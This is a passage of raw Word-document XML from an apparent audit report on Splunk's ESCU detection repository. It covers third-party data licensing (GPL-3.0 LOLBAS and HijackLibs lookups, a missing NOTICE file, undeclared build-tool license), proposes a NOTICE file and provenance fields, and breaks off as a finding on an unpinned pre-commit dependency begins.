          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (hexacorn reference) columns mirror HijackLibs YAML fields).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>magicsword-io/LOLDrivers - Apache-2.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>loldrivers.csv</w:t>
      </w:r>
      <w:r>
        <w:t>) - compatible, but Apache-2.0 S4(c)/(d) still requires retaining attribution/NOTICE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>magicsword-io/LOLRMM - Apache-2.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>remote_access_software.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> carries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>comment_reference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vendor URLs consistent with LOLRMM; unverified).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>abuse.ch SSLBL - CC0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (verified on abuse.ch ToS) - no obligation, attribution present in description (good).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mitre/cti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attack-stix-data</w:t>
      </w:r>
      <w:r>
        <w:t>) - permissive MITRE license that *requires* the notice "The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license ... ATT&amp;CK is a registered trademark" to accompany redistribution; contentctl-ng pulls ATT&amp;CK STIX at build time (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>enrichments</w:t>
      </w:r>
      <w:r>
        <w:t>) and ESCU tags every detection with technique IDs/names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SigmaHQ rules - Detection Rule License (DRL) 1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[TK]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requires attribution; 11 detections link the originating Sigma rule in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>references</w:t>
      </w:r>
      <w:r>
        <w:t>, which is a reasonable attribution, but there is no license statement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`dynamic_dns_providers_default.csv`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (91,976 wildcard domains) has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no stated provenance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - unknown license.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10 SOAR custom functions and 16 sub-playbooks come from the Splunk SOAR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>community</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> repo (Splunk-owned, Apache-2.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[TK]</w:t>
      </w:r>
      <w:r>
        <w:t>) - compatible, but no per-file header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">GPL-3.0 datasets: whether a CSV of facts is copyrightable at all is jurisdiction-dependent (US: facts are not, but selection/arrangement and descriptions can be). If the LOLBAS/HijackLibs descriptions are copied verbatim, redistributing them inside an Apache-2.0/commercially-distributed Splunk app without the GPL text and source offer is a GPL-3.0 S4-S6 violation and an Apache-2.0 incompatibility (GPL-3.0 is one-way compatible: Apache code can go into GPL projects, not the reverse). There is also </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no `NOTICE` file anywhere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find . -iname 'NOTICE*'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; none), no per-file license headers in any Python file (0 of 94), and the core build tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> publishes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no license metadata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (pip-licenses: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>UNKNOWN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) while its source repo is not publicly readable - Splunk can resolve this internally, but downstream consumers of the PyPI package cannot determine their rights. Python dependency tree copyleft scan: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pygit2 1.20.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = "GPLv2 with linking exception" (LGPL-like; permitted for a tool, not redistributed in the app); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamllint 1.38.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = GPL-3.0-or-later (CI tool only, not distributed) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no copyleft component is shipped to customers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; everything else is MIT/BSD/Apache/PSF/MPL-2.0 (certifi, tqdm - file-level copyleft, unmodified use is fine). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: N/A (legal). Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not a technical exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; compliance exposure for Splunk as distributor. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/LICENSE | head -3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; "GNU GENERAL PUBLIC LICENSE Version 3"; same for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wietze/HijackLibs/main/LICENSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.../magicsword-io/LOLDrivers/main/LICENSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Apache-2.0; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip-licenses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> row </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng 1.1.1 UNKNOWN UNKNOWN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rlE 'Copyright|Licensed under|SPDX-License' --include='*.py' .github scripts .pre-commit-hooks playbooks | wc -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (process + files; no code change in detections):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># NOTICE  (new file at repo root; contentctl-ng should copy it into the app package)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ES Content Update (ESCU)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Copyright 2026 Splunk Inc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Licensed under the Apache License, Version 2.0.</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>This product includes data derived from third-party projects:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- MITRE ATT&amp;CK(R) - (c) The MITRE Corporation. "This work is reproduced and distributed with the permission of The MITRE Corporation." https://attack.mitre.org/resources/legal-and-branding/terms-of-use/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- abuse.ch SSL Certificate Blacklist (SSLBL) - CC0 1.0 - https://sslbl.abuse.ch/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- LOLDrivers (magicsword-io/LOLDrivers) - Apache-2.0 - https://github.com/magicsword-io/LOLDrivers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- LOLRMM (magicsword-io/LOLRMM) - Apache-2.0 - https://github.com/magicsword-io/LOLRMM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- Sigma rules (SigmaHQ/sigma) - Detection Rule License 1.1 - individual rules are credited in each detection's `references`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>- Splunk SOAR Community playbooks/custom functions (phantom-community) - Apache-2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">For the two GPL-3.0 sources, choose one: (a) obtain written permission/dual-license from the LOLBAS and HijackLibs maintainers for the specific CSV extracts; (b) re-derive the lookups from first principles (file names/paths are facts) and drop any copied </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prose; or (c) ship them under GPL-3.0 as a clearly separated, optional lookup pack with full license text. Record provenance in the lookup YAML so the build can emit the NOTICE automatically:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># lookups/csv/lolbas_file_path.yml (add fields; requires a small CSVLookup schema extension)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name: lolbas_file_path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>description: A list of LOLBAS and their file path used in determining if a script or binary is valid on windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source: https://github.com/LOLBAS-Project/LOLBAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source_license: GPL-3.0-only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source_commit: &lt;sha of the LOLBAS commit the extract was generated from&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">For contentctl-ng: add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>license = "Apache-2.0"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>license-files = ["LICENSE"]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pyproject.toml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and republish (1.1.2). Why it works: NOTICE + per-lookup provenance satisfies Apache-2.0 S4(d), the MITRE terms and DRL attribution; separating or re-deriving GPL material removes the incompatibility; a declared license on the build tool lets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip-licenses</w:t>
      </w:r>
      <w:r>
        <w:t>/SBOM tooling (CycloneDX) pass policy checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-829 Inclusion of Functionality from Untrusted Control Sphere. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-8 System Component Inventory, SA-22 Unsupported System Components, SR-3 Supply Chain Controls and Processes, SR-4 Provenance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GV.SC Govern - Cybersecurity Supply Chain Risk Management, ID.AM Identify - Asset Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.21 Managing information security in the ICT supply chain, A.5.32, A.8.19 Installation of software on operational systems. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-10 — Unpinned yamlfmt@latest, floating Go toolchain and sibling-directory executable probe in the pre-commit hook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.8). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/yaml-validation.yml:49-55; .pre-commit-hooks/yamlfmt-hook.py:33-49,106-111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
